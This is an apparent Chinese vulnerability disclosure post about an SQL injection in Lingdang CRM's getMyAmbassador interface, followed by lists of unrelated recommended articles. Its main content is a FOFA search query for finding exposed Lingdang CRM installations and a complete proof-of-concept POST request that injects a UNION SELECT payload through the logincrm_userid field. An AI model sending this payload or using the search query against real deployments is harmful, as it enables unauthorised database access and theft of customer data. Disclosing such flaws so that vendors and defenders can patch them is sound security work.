灵当CRM系统接口getMyAmbassador存在SQL注入漏洞

0x大先生2025-01-03 15:55

灵当CRM系统接口getMyAmbassador存在SQL注入漏洞

灵当CRM系统接口getMyAmbassador存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。

fofa

javascript 复制代码 
body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")

poc

javascript 复制代码 
POST /crm/WeiXinApp/marketing/index.php?module=Ambassador&action=getMyAmbassador HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close

logincrm_userid=-1 union select user(),2,3#
相关推荐
····懂···36 分钟前
攻克PostgreSQL专家认证
数据库·postgresql
每天都在想吃啥1 小时前
day31 SQLITE
数据库·sqlite
m0_748254094 小时前
2025最新华为云国际版注册图文流程-不用绑定海外信用卡注册
服务器·数据库·华为云
大新屋4 小时前
MongoDB 分片集群修改管理员密码
数据库·mongodb
ejinxian4 小时前
MySQL/Kafka数据集成同步,增量同步及全量同步
数据库·mysql·kafka
未来之窗软件服务4 小时前
数据库优化提速(一)之进销存库存管理—仙盟创梦IDE
数据库·sql·数据库调优
Mapmost5 小时前
信创浪潮下的GIS技术变革:从自主可控到生态繁荣
数据库
foundbug9995 小时前
Node.js导入MongoDB具体操作
数据库·mongodb·node.js
天天进步20155 小时前
Node.js中的Prisma应用:现代数据库开发的最佳实践
数据库·node.js·数据库开发
hui函数6 小时前
Flask高效数据库操作指南
数据库·python·flask
热门推荐
01UV安装并设置国内源02DeepSeek更新!速览DeepSeek V3.1新特性03Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code04KGG转MP3工具|非KGM文件|解密音频05蜘蛛磁力 搜索引擎大全,如何使用蜘蛛磁力查找磁力链接06【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)07Spring 调试终于不再痛苦了082025最新国内服务器可用docker源仓库地址大全(2025年8月更新)09Claude Code VSCode集成开发指南:AI编程助手完整配置10NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南